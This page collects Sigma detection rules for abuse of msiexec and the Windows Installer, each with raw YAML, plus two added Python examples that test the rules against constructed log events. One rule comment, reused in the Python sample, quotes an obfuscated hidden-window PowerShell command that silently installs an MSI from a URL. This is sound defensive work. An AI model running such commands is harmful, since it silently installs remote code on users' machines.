Sigma is the open generic signature format for SIEM systems. Each rule below converts to native syntax for Splunk, Elastic, Sentinel, and other SIEMs. Each rule's summary is followed by its raw Sigma YAML.
Obfuscated PowerShell MSI Install via WindowsInstaller COM
Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (`WindowsInstaller.Installer`). The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of `InstallProduct` and COM object creation, particularly combined with hidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction.
status: experimental | author: Meroujan Antonyan (vx3r) | id: 7b6a7418-3afc-11f0-aff4-000d3abf478c | level: high
Sigma YAML:
title: Obfuscated PowerShell MSI Install via WindowsInstaller COM
id: 7b6a7418-3afc-11f0-aff4-000d3abf478c
status: experimental
description: |
    Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (`WindowsInstaller.Installer`).
    The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting
    malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection
    by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of `InstallProduct` and COM object creation, particularly combined with
    hidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction.
references:
    - https://informationsecuritybuzz.com/the-real-danger-behind-a-simple-windows-shortcut/
    - https://redcanary.com/blog/threat-intelligence/intelligence-insights-may-2025/
    - https://www.virustotal.com/gui/file/f9710b0ba4de5fa0e7ec27da462d4d2fc6838eba83a19f23f6617a466bbad457
author: Meroujan Antonyan (vx3r)
date: 2025-05-27
tags:
    - attack.stealth
    - attack.t1027.010
    - attack.t1218.007
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    # Example: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -C "$u='htps://example.com/';$i=New-Object -ComObject('indowsInstaller.Installer'.Insert(0,'W'));$i.UILevel=2;$i.InstallProduct($(if($u.StartsWith('htps://')){$u.Insert(2,'t')}else{$u}),'')";
    selection_img:
        - Image|endswith:
              - '\powershell_ise.exe'
              - '\powershell.exe'
              - '\pwsh.exe'
        - OriginalFileName:
              - 'PowerShell_ISE.EXE'
              - 'PowerShell.EXE'
              - 'pwsh.dll'
    selection_cli:
        CommandLine|contains|all:
            - '-ComObject'
            - 'InstallProduct('
            - '.Insert('
            - 'UILevel'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high
DllUnregisterServer Function Call Via Msiexec.EXE
Detects MsiExec loading a DLL and calling its DllUnregisterServer function
status: test | author: frack113 | id: 84f52741-8834-4a8c-a413-2eb2269aa6c8 | level: medium
Sigma YAML:
title: DllUnregisterServer Function Call Via Msiexec.EXE
id: 84f52741-8834-4a8c-a413-2eb2269aa6c8
status: test
description: Detects MsiExec loading a DLL and calling its DllUnregisterServer function
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md
    - https://lolbas-project.github.io/lolbas/Binaries/Msiexec/
    - https://twitter.com/_st0pp3r_/status/1583914515996897281
author: frack113
date: 2022-04-24
modified: 2024-03-13
tags:
    - attack.stealth
    - attack.t1218.007
logsource:
    product: windows
    category: process_creation
detection:
    selection_img:
        - Image|endswith: '\msiexec.exe'
        - OriginalFileName: '\msiexec.exe'
    selection_flag:
        CommandLine|contains|windash: ' -z '
    selection_dll:
        CommandLine|contains: '.dll'
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium
MSI Installation From Web
Detects installation of a remote msi file from web.
status: test | author: Stamatis Chatzimangou | id: 5594e67a-7f92-4a04-b65d-1a42fd824a60 | level: medium
Sigma YAML:
title: MSI Installation From Web
id: 5594e67a-7f92-4a04-b65d-1a42fd824a60
status: test
description: Detects installation of a remote msi file from web.
references:
    - https://twitter.com/_st0pp3r_/status/1583922009842802689
author: Stamatis Chatzimangou
date: 2022-10-23
tags:
    - attack.stealth
    - attack.t1218
    - attack.t1218.007
logsource:
    product: windows
    service: application
# warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
detection:
    selection:
        Provider_Name: 'MsiInstaller'
        EventID:
            - 1040
            - 1042
        Data|contains: '://'
    condition: selection
falsepositives:
    - Unknown
level: medium
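The warning in the logsource section matters in practice: backends rarely expose one field holding the whole event data, so the rule only works once every Data element of the record is joined before `Data|contains` is applied. As an added example, not part of this page or of the Sigma project, the Python below parses Windows Application log records rendered as XML, joins their Data elements into one string, and applies the selection of MSI Installation From Web to them. The records are constructed, the EventData layout of MsiInstaller events 1040 and 1042 is assumed, and the `package_source` helper is an addition for triage rather than part of the rule.

```python
"""Added example (not Sigma project code): applying 'MSI Installation From Web' to Windows
Application log records rendered as XML. The records are constructed; the EventData layout
of MsiInstaller events 1040/1042 is assumed, so check it against your own exported events."""
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed records. 1040/1042 are the 'Beginning/Ending a Windows Installer transaction' events.
SAMPLE_RECORDS = {
    # Transaction whose package is an HTTPS URL: the rule should alert.
    "remote_msi": r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="MsiInstaller"/><EventID>1040</EventID></System>
  <EventData><Data>https://updates.example.net/agent.msi</Data><Data>4120</Data></EventData>
</Event>""",
    # Transaction end for a local package: no '://' anywhere in the data.
    "local_msi": r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="MsiInstaller"/><EventID>1042</EventID></System>
  <EventData><Data>C:\Users\alice\Downloads\agent.msi</Data><Data>4120</Data></EventData>
</Event>""",
    # A different provider logging a URL under the same event number: Provider_Name fails.
    "other_provider": r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="ExampleUpdater"/><EventID>1040</EventID></System>
  <EventData><Data>Checking https://updates.example.net/manifest.json</Data></EventData>
</Event>""",
    # MsiInstaller event 11707 (installation completed) that mentions a URL: EventID fails.
    "install_success": r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="MsiInstaller"/><EventID>11707</EventID></System>
  <EventData><Data>Product: Agent -- Installation completed successfully.</Data><Data>https://updates.example.net/agent.msi</Data></EventData>
</Event>""",
}


def parse_record(xml_text):
    """Flatten an event into the fields the rule names. 'Data' joins every <Data> element,
    which is what the rule's logsource warning means by 'the event data as a whole'."""
    root = ET.fromstring(xml_text)
    provider = root.find("e:System/e:Provider", NS).get("Name")
    event_id = int(root.findtext("e:System/e:EventID", namespaces=NS))
    data = " ".join(d.text or "" for d in root.findall("e:EventData/e:Data", NS))
    return {"Provider_Name": provider, "EventID": event_id, "Data": data}


def msi_install_from_web(fields):
    """Selection of rule 5594e67a-7f92-4a04-b65d-1a42fd824a60: provider MsiInstaller,
    event id 1040 or 1042, and '://' anywhere in the joined data."""
    return (fields["Provider_Name"] == "MsiInstaller"
            and fields["EventID"] in (1040, 1042)
            and "://" in fields["Data"])


def package_source(fields):
    """First whitespace-delimited token containing '://', for triage of a hit (assumed layout)."""
    return next((t for t in fields["Data"].split() if "://" in t), None)


def evaluate_records(records=SAMPLE_RECORDS):
    """Record name -> alert? for every constructed record."""
    return {name: msi_install_from_web(parse_record(xml)) for name, xml in records.items()}


if __name__ == "__main__":
    for name, xml in SAMPLE_RECORDS.items():
        fields = parse_record(xml)
        verdict = "ALERT" if msi_install_from_web(fields) else "no match"
        print(f"{name:16} {verdict:8} {package_source(fields)}")
```

Only the first record alerts: the local package has no scheme, the other provider is excluded by Provider_Name, and the install-success event is excluded by EventID even though its data carries a URL. When the rule is converted for a real backend, the join performed by `parse_record` has to exist in the ingestion pipeline or the field mapping, otherwise `Data|contains` is evaluated against a single Data element and the URL can be missed.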
MsiExec Web Install
Detects suspicious msiexec process starts with web addresses as parameter
status: test | author: Florian Roth (Nextron Systems) | id: f7b5f842-a6af-4da5-9e95-e32478f3cd2f | level: medium
Sigma YAML:
title: MsiExec Web Install
id: f7b5f842-a6af-4da5-9e95-e32478f3cd2f
related:
    - id: 8150732a-0c9d-4a99-82b9-9efb9b90c40c
      type: similar
status: test
description: Detects suspicious msiexec process starts with web addresses as parameter
references:
    - https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/
author: Florian Roth (Nextron Systems)
date: 2018-02-09
modified: 2022-01-07
tags:
    - attack.stealth
    - attack.t1218.007
    - attack.command-and-control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - ' msiexec'
            - '://'
    condition: selection
falsepositives:
    - False positives depend on scripts and administrative tools used in the monitored environment
level: medium
Msiexec Quiet Installation
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
status: test | author: frack113 | id: 79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5 | level: medium
Sigma YAML:
title: Msiexec Quiet Installation
id: 79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5
status: test
description: |
    Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.
    Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
references:
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md
    - https://twitter.com/_st0pp3r_/status/1583914244344799235
author: frack113
date: 2022-01-16
modified: 2024-12-01
tags:
    - attack.stealth
    - attack.t1218.007
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\msiexec.exe'
        - OriginalFileName: 'msiexec.exe'
    selection_cli:
        # Note that there is no space before and after the arguments because it's possible to write a commandline as such
        # Example: msiexec -q/i [MSI Package]
        CommandLine|contains|windash:
            - '-i'
            - '-package'
            - '-a'
            - '-j'
    selection_quiet:
        CommandLine|contains|windash: '-q'
    filter_user_temp:
        # The %temp% is a very common location for installers
        ParentImage|startswith: 'C:\Users\'
        ParentImage|contains: '\AppData\Local\Temp\'
    filter_system_temp:
        ParentImage|startswith: 'C:\Windows\Temp\'
    filter_ccm:
        ParentImage: 'C:\Windows\CCM\Ccm32BitLauncher.exe'
        IntegrityLevel:
            - 'System'
            - 'S-1-16-16384'
    condition: all of selection_* and not 1 of filter_*
falsepositives:
    - WindowsApps installing updates via the quiet flag
level: medium
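To make the matching semantics of this rule visible, in particular the `windash` modifier that lets `'-q'` also match `/q` and the Unicode dashes, and the `all of selection_* and not 1 of filter_*` condition, here is an added worked example that is not part of this page or of the Sigma project: a small Python evaluator for the subset of Sigma these msiexec rules use (`contains`, `startswith`, `endswith`, `all`, `windash`, lists of maps as OR). It transcribes the detection section of Msiexec Quiet Installation and the selection logic of the Obfuscated PowerShell MSI Install via WindowsInstaller COM rule at the top of the page, then runs them over constructed process-creation events. The token rule used to approximate `windash`, the event field layout, and the sample paths and user name are assumptions.

```python
"""Added example (not Sigma project code): minimal evaluator for the Sigma subset
used by the msiexec rules on this page, run over constructed process-creation events."""
import re

# Dash-like prefixes Sigma's windash modifier treats as equivalent:
# hyphen, slash, en dash, em dash, horizontal bar.
DASH_VARIANTS = ("-", "/", "\u2013", "\u2014", "\u2015")
# Assumption: a '-' or '/' that begins an argument token is the position windash expands.
_WINDASH_RE = re.compile(r"(?<!\w)[-/](?=\w)")
# String operators for the modifiers used on this page (plain equality otherwise).
OPS = {"contains": lambda a, p: p in a, "startswith": str.startswith, "endswith": str.endswith}


def windash_variants(pattern):
    """Expand '-q' into ['-q', '/q', '\u2013q', '\u2014q', '\u2015q'], one variant per dash."""
    variants, pos = [""], 0
    for m in _WINDASH_RE.finditer(pattern):
        literal = pattern[pos:m.start()]
        variants = [v + literal + d for v in variants for d in DASH_VARIANTS]
        pos = m.end()
    return [v + pattern[pos:] for v in variants]


def field_matches(field_spec, wanted, event):
    """Evaluate one 'Field|modifiers: value(s)' entry; case-insensitive, as in Sigma."""
    field, *mods = field_spec.split("|")
    actual = str(event.get(field, "")).lower()
    op = next((OPS[m] for m in mods if m in OPS), str.__eq__)
    values = wanted if isinstance(wanted, list) else [wanted]
    hits = []
    for v in values:
        patterns = windash_variants(str(v)) if "windash" in mods else [str(v)]
        hits.append(any(op(actual, p.lower()) for p in patterns))
    return all(hits) if "all" in mods else any(hits)  # 'all': every listed value must hit


def selection_matches(selection, event):
    """A mapping is AND over its fields; a list of mappings is OR over them."""
    if isinstance(selection, list):
        return any(selection_matches(item, event) for item in selection)
    return all(field_matches(k, v, event) for k, v in selection.items())


def rule_matches(detection, event):
    """Condition shared by these rules: 'all of selection_* and not 1 of filter_*'."""
    selections = [v for k, v in detection.items() if k.startswith("selection")]
    filters = [v for k, v in detection.items() if k.startswith("filter")]
    return all(selection_matches(s, event) for s in selections) and not any(
        selection_matches(f, event) for f in filters)


# Detection section of 'Msiexec Quiet Installation' (id 79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5).
QUIET_INSTALL = {
    "selection_img": [{"Image|endswith": "\\msiexec.exe"}, {"OriginalFileName": "msiexec.exe"}],
    "selection_cli": {"CommandLine|contains|windash": ["-i", "-package", "-a", "-j"]},
    "selection_quiet": {"CommandLine|contains|windash": "-q"},
    "filter_user_temp": {"ParentImage|startswith": "C:\\Users\\",
                         "ParentImage|contains": "\\AppData\\Local\\Temp\\"},
    "filter_system_temp": {"ParentImage|startswith": "C:\\Windows\\Temp\\"},
    "filter_ccm": {"ParentImage": "C:\\Windows\\CCM\\Ccm32BitLauncher.exe",
                   "IntegrityLevel": ["System", "S-1-16-16384"]},
}
# Detection section of 'Obfuscated PowerShell MSI Install via WindowsInstaller COM' (id 7b6a7418-...).
OBFUSCATED_COM_INSTALL = {
    "selection_img": [{"Image|endswith": ["\\powershell_ise.exe", "\\powershell.exe", "\\pwsh.exe"]},
                      {"OriginalFileName": ["PowerShell_ISE.EXE", "PowerShell.EXE", "pwsh.dll"]}],
    "selection_cli": {"CommandLine|contains|all": ["-ComObject", "InstallProduct(", ".Insert(", "UILevel"]},
}


def event(cmd, image="C:\\Windows\\System32\\msiexec.exe", parent="C:\\Windows\\System32\\cmd.exe"):
    """Constructed process-creation event (field names as in Sigma's process_creation logsource)."""
    return {"Image": image, "CommandLine": cmd, "ParentImage": parent, "IntegrityLevel": "Medium"}


SAMPLE_EVENTS = {
    # Quiet install from Downloads, launched by cmd.exe: the rule should alert.
    "quiet_from_downloads": event("msiexec -q/i C:\\Users\\alice\\Downloads\\tool.msi"),
    # Same command typed with en dashes (U+2013), e.g. pasted from a document: windash still matches.
    "quiet_en_dash": event("msiexec \u2013q \u2013i C:\\Users\\alice\\Downloads\\tool.msi"),
    # Self-extracting installer running from %temp%: suppressed by filter_user_temp.
    "quiet_from_user_temp": event("msiexec /qn /i C:\\Users\\alice\\AppData\\Local\\Temp\\app.msi",
                                  parent="C:\\Users\\alice\\AppData\\Local\\Temp\\setup.exe"),
    # Interactive install with no quiet switch: selection_quiet fails.
    "interactive_install": event("msiexec /i C:\\Users\\alice\\Downloads\\tool.msi"),
    # Another binary with look-alike switches: selection_img fails.
    "not_msiexec": event("notepad -q -i notes.txt", image="C:\\Windows\\System32\\notepad.exe"),
}
# The example command line quoted in the first rule's detection comment, as a PowerShell event.
COM_EXAMPLE = event(
    '"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe" -W Hidden -C "$u=\'htps://example.com/\';'
    "$i=New-Object -ComObject('indowsInstaller.Installer'.Insert(0,'W'));$i.UILevel=2;"
    "$i.InstallProduct($(if($u.StartsWith('htps://')){$u.Insert(2,'t')}else{$u}),'')\"",
    image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe")


def evaluate_samples():
    """Rule name -> {sample name -> alert?} for every constructed event."""
    return {
        "quiet_install": {n: rule_matches(QUIET_INSTALL, e) for n, e in SAMPLE_EVENTS.items()},
        "obfuscated_com": {"rule_example": rule_matches(OBFUSCATED_COM_INSTALL, COM_EXAMPLE)},
    }


if __name__ == "__main__":
    for rule, results in evaluate_samples().items():
        print(rule, {n: "ALERT" if hit else "no match" for n, hit in results.items()})
```

Running it shows the quiet install from Downloads and its en-dash variant alerting, the copy launched from `%temp%` suppressed by `filter_user_temp`, the interactive install never satisfying `selection_quiet`, and the first rule's own example command line matching all four `selection_cli` substrings. The filters are worth reading as carefully as the selections: an installer staged under `\AppData\Local\Temp\` is exactly the false-positive case the rule trades away, so that path should be covered by other telemetry. For production, convert the rules with sigma-cli or pySigma for your backend; this evaluator exists to make the semantics inspectable, not to replace the converter.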
PowerShell WMI Win32_Product Install MSI
Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class
status: test | author: frack113 | id: 91109523-17f0-4248-a800-f81d9e7c081d | level: medium
Sigma YAML:
title: PowerShell WMI Win32_Product Install MSI
id: 91109523-17f0-4248-a800-f81d9e7c081d
status: test
description: Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md
author: frack113
date: 2022-04-24
tags:
    - attack.stealth
    - attack.t1218.007
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains|all:
            - 'Invoke-CimMethod '
            - '-ClassName '
            - 'Win32_Product '
            - '-MethodName '
            - '.msi'
    condition: selection
falsepositives:
    - Unknown
level: medium
Suspicious MsiExec Embedding Parent
Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads
status: test | author: frack113 | id: 4a2a2c3e-209f-4d01-b513-4155a540b469 | level: medium
Sigma YAML:
title: Suspicious MsiExec Embedding Parent
id: 4a2a2c3e-209f-4d01-b513-4155a540b469
status: test
description: Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md
author: frack113
date: 2022-04-16
modified: 2022-07-14
tags:
    - attack.stealth
    - attack.t1218.007
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\cmd.exe'
        ParentCommandLine|contains|all:
            - 'MsiExec.exe'
            - '-Embedding '
    filter_splunk_ufw:
        Image|endswith: ':\Windows\System32\cmd.exe'
        CommandLine|contains: 'C:\Program Files\SplunkUniversalForwarder\bin\'
    filter_vs:
        - CommandLine|contains: '\DismFoDInstall.cmd'
        - ParentCommandLine|contains|all:
              - '\MsiExec.exe -Embedding '
              - 'Global\MSI0000'
    condition: selection and not 1 of filter*
falsepositives:
    - Unknown
level: medium
Suspicious Msiexec Execute Arbitrary DLL
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
status: test | author: frack113 | id: 6f4191bb-912b-48a8-9ce7-682769541e6d | level: medium
Sigma YAML:
title: Suspicious Msiexec Execute Arbitrary DLL
id: 6f4191bb-912b-48a8-9ce7-682769541e6d
status: test
description: |
    Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.
    Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
references:
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md
    - https://twitter.com/_st0pp3r_/status/1583914515996897281
author: frack113
date: 2022-01-16
modified: 2026-01-09
tags:
    - attack.stealth
    - attack.t1218.007
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\msiexec.exe'
        CommandLine|contains|windash: ' /Y'
    filter_main_legit_path:
        CommandLine|contains:
            - '\MsiExec.exe" /Y "C:\Program Files\'
            - '\MsiExec.exe" /Y "C:\Program Files (x86)\'
            - '\MsiExec.exe" /Y "C:\Windows\System32\'
            - '\MsiExec.exe" /Y "C:\Windows\SysWOW64\'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Legitimate script
level: medium
Suspicious Msiexec Quiet Install From Remote Location
Detects usage of Msiexec.exe to install packages hosted remotely quietly
status: test | author: Nasreddine Bencherchali (Nextron Systems) | id: 8150732a-0c9d-4a99-82b9-9efb9b90c40c | level: medium
Sigma YAML:
title: Suspicious Msiexec Quiet Install From Remote Location
id: 8150732a-0c9d-4a99-82b9-9efb9b90c40c
related:
    - id: f7b5f842-a6af-4da5-9e95-e32478f3cd2f
      type: similar
status: test
description: Detects usage of Msiexec.exe to install packages hosted remotely quietly
references:
    - https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-28
modified: 2025-10-07
tags:
    - attack.stealth
    - attack.t1218.007
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\msiexec.exe'
        - OriginalFileName: 'msiexec.exe'
    selection_cli:
        # Note that there is no space before and after the arguments because it's possible to write a commandline as such
        # Example: msiexec -q/i [MSI Package]
        CommandLine|contains|windash:
            - '-i'
            - '-package'
            - '-a'
            - '-j'
    selection_quiet:
        CommandLine|contains|windash: '-q'
    selection_remote:
        CommandLine|contains:
            - 'http'
            - '\\\\'
    filter_optional_openoffice:
        CommandLine|contains|all:
            - '\AppData\Local\Temp\OpenOffice'
            - 'Installation Files\openoffice'
    condition: all of selection_* and not 1 of filter_optional_*
falsepositives:
    - Unknown
level: medium